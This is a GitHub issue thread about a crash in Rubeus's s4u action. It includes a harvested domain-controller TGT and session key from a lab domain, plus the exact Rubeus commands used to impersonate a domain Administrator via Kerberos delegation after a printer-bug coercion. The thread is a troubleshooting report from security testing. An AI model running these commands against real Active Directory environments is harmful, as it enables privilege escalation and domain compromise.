Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Unhandled Exception: System.OverflowException: Value was either too large or too small for a UInt32. #19

Closed
iambooker opened this issue Feb 1, 2019 · 5 comments
Closed

Unhandled Exception: System.OverflowException: Value was either too large or too small for a UInt32. #19

iambooker opened this issue Feb 1, 2019 · 5 comments

Comments

@iambooker
Copy link

Hello guys,

I am using the monitor action in order to grab TGTs after a successful "attack" against the "Print Spooler" service that is running on a domain host (in our case LABS-DC01$).

UserName                 : LABS-DC01$
Domain                   : LABS
LogonId                  : 4773477
UserSID                  : S-1-5-21-1871540109-507438259-1164035318-1001
AuthenticationPackage    : Kerberos
LogonType                : Network
LogonTime                : 2/1/2019 10:14:21 AM
LogonServer              :
LogonServerDNSDomain     : LABS.COM
UserPrincipalName        :

ServiceName              : krbtgt/LABS.COM
TargetName               :
ClientName               : LABS-DC01$
DomainName               : LABS.COM
TargetDomainName         : LABS.COM
AltTargetDomainName      : LABS.COM
SessionKeyType           : aes256_cts_hmac_sha1
Base64SessionKey         : EFzxu0gMFHnvXEA81575frbhPdKySWK/Y871RmTAaf4=
KeyExpirationTime        : 1/1/1601 2:00:00 AM
TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime                : 2/1/2019 10:25:38 AM
EndTime                  : 2/1/2019 8:25:37 PM
RenewUntil               : 2/8/2019 10:25:37 AM
TimeSkew                 : 0
EncodedTicketSize        : 1298
Base64EncodedTicket      :

  doIFDjCCBQqgAwIBBaEDAgEWooIEHTCCBBlhggQVMIIEEaADAgEFoQobCExBQlMuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhM
  QUJTLkNPTaOCA90wggPZoAMCARKhAwIBAqKCA8sEggPHCHEZUk6cFgzygCwKDHNBIOzsASgUU71oObTLeO3+auqYTSBSpk3k6LPq
  bJerplsgo7iijLdZeTDRcHeNjS66MC6z4pFO+xgsjIWEpI/f3Ou4gozQi2goglKoZ/suixrQyRxJCYl7VZZtyqwrR6m19N2dGAXG
  BmI1mKiJCtEkYnew8d2QrKuNoWHSPjK8Yf0sF93u76foKCokjYYr9Em5Lys37oH5iHaHGOmJF87OoZtmPPQ0vilEeD9Atc5dLhGw
  qPXG0fnjn3Z4ysMWHuKpOTpT37NBjYZK3zrPLsHjznC4fRrSQNIooXk47dHPSyAeS4vZpYx3RF2flC4rM9TdK2esks7IM15LWhfM
  1Le1dRwlFuFWKxMXBl9uNj8D2ZsopHZIA/b+PKo0vItpLKE7XsNUHA+sPMxIRd8xpkFqGvFpYLhK025W9lS/cpS9c+TTh4VbbQJG
  cWXcuw5Saj3VSr3hY3U5xBuyGfB7F448wm+dqwNVshdAoR/EXcAD4Qd2Qe8pHtHLv5IZdgpUBbIj9fYrm9UpS1tZrD2UCXnLcB2E
  6E3NP+uAZpqnIDT1XXfpc/7W9Cfu1UcAxRBNFehRXWtxFShH4dKPF3Q59MOOQ8dXCKBQdt3fwrVLqVCHHJ/VOwHg3nYBhkVVtKw0
  rmmumtvuQ5C+JjCQj96/VjNLeZLVrPMHpFgTm08BSNyQ80iTFRQcdD80KJE2IduODatyy3Lnn6W1G7tts52X8rY+wslppciWI/CY
  rTnjcLw+MmqNuiL1iQrgIOnYUPU+wUJSCZvDpc/LwW6ovPzyKqz4poM5K9U2b+CdTxJlOrOaPKyKbqPr7ZKyTTIe+3ZDjcx8N6M6
  BxvOm04PhdWEoqPRDAySF2A/x90AqklxuP46eQ8ppZ89pXhzXTbWc1GQ+MyPV42pWK1ZEMSPtCRufN7uu1SYMxDC7BqIpEjvVxeC
  O9/lEhkRdWOu20yK0krmlNM/FX4/pU9pSEtWp+dhWUTV1nsrD75PmO1xUjV3dwyaXtD3ciK9XbTglg+iSgukNaicBiBdA3P4G/H0
  PzO6BsLOGUEIhyEXCFNGl4KEWzm176k+jQoQjbtocDoSlah2n9lNe8kjHd1TEAKFmRLaOacPxz3UdLdP8xB/umspeuJ3V2H+y1H4
  5fkJ5V4WdLtVHDpaPocdWeNB7/jMrxP5g1HFnpU4LsAcZeHC0YSDPSbZCdefD8uAh9dt8AEKIl4sEwWCKnPhGG7PyeZmebbO0Xji
  dbnv00m6W9eomfTjCGNQxNAj3Y57KWZRHKOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIBBc8btI
  DBR571xAPNee+X624T3Sskliv2PO9UZkwGn+oQobCExBQlMuQ09NohcwFaADAgEBoQ4wDBsKTEFCUy1EQzAxJKMHAwUAYKEAAKUR
  GA8yMDE5MDIwMTA4MjUzOFqmERgPMjAxOTAyMDExODI1MzdapxEYDzIwMTkwMjA4MDgyNTM3WqgKGwhMQUJTLkNPTakdMBugAwIB
  AqEUMBIbBmtyYnRndBsITEFCUy5DT00=

Then, I am using the s4u action with the harvested TGT ticket (i have provided it both in base64 raw format and in .kirbi format after proper conversion) in order to impersonate a Domain Admin account and get a TGS ticket for the CIFS service on the DC.

The problem is that I am getting the following error during the execution of s4u action:
Execution of S4U Action:
.\Rubeus.exe s4u /impersonateuser:Administrator /ticket:<base64-ticket-value> /msdsspn:cifs/labs-dc01.labs.com

OR:

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64-ticket-value>")) .\Rubeus.exe s4u /impersonateuser:Administrator /ticket:ticket.kirbi /msdsspn:cifs/labs-dc01.labs.com

Error:

[] Action: S4U
[] Using domain controller: LABS-DC01.labs.com (10.10.10.20)
[] Building S4U2self request for: 'LABS.COM\LABS-DC01$'
[] Impersonating user 'Administrator' to target SPN 'cifs/labs-dc01.labs.com'
[] Sending S4U2self request
[] Connecting to 10.10.10.20:88
[] Sent 1458 bytes
[] Received 1482 bytes
[+] S4U2self success!
[] Building S4U2proxy request for service: 'cifs/labs-dc01.labs.com'
[] Sending S4U2proxy request
[] Connecting to 10.10.10.20:88
[] Sent 2557 bytes
[*] Received 127 bytes
Unhandled Exception: System.OverflowException: Value was either too large or too small for a UInt32.
at System.Convert.ToUInt32(Int64 value)
at Rubeus.KRB_ERROR..ctor(AsnElt body)
at Rubeus.S4U.Execute(KRB_CRED kirbi, String targetUser, String targetSPN, Boolean ptt, String domainController, String altService)
at Rubeus.Commands.S4u.Execute(Dictionary2 arguments)
at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments)

Is that an issue indeed or i am missing something?
@iambooker
Copy link
Author

The issue has been resolved! I should use another release of Rubeus in order to achieve what i want to do!

@HarmJ0y
Copy link
Member

HarmJ0y commented Feb 5, 2019

@stathisb how did you resolve the issue? It looks like some value in KRB_ERROR is being miscast, but without being able to recreate I don't know the best way to trace which value it is.

@HarmJ0y HarmJ0y mentioned this issue Feb 5, 2019
Open
@iambooker
Copy link
Author

@HarmJ0y i was testing some case studies of the well known article "Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory" of Elad Shamir. I got this issue when i tested the exploitation of unconstrained delegation in conjunction with"the printer bug". Also, the same issue arose when i tested the case-study with name "When Accounts Collude - TrustedToAuthForDelegation Who?" that illustrated by Shamir on his article. However, this attack make use of a forwardable TGS during the execution of SU4, something that is not provided by your Rubeus current release.
Finally, this issue was resolved by using the modified Rubeus released by Shamir! I did not tested if Shamir's release can resolve the issue in the "print spooler" case-study.

@HarmJ0y
Copy link
Member

HarmJ0y commented Feb 7, 2019

So Elad's modification listed on that post (eladshamir@10689df) was integrated yesterday in the Rubeus master branch (47f330f) . If you can retest using the most up to date Rubeus master branch, let me know, but for now I'm going to close this issue out.

@HarmJ0y HarmJ0y closed this as completed Feb 7, 2019
@iambooker
Copy link
Author

@HarmJ0y , I have tested your current release against my previous unsuccessful case-studies and now it seems that the issue has been resolved! I will further inform you in case of any other issue. Thank you :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@HarmJ0y @iambooker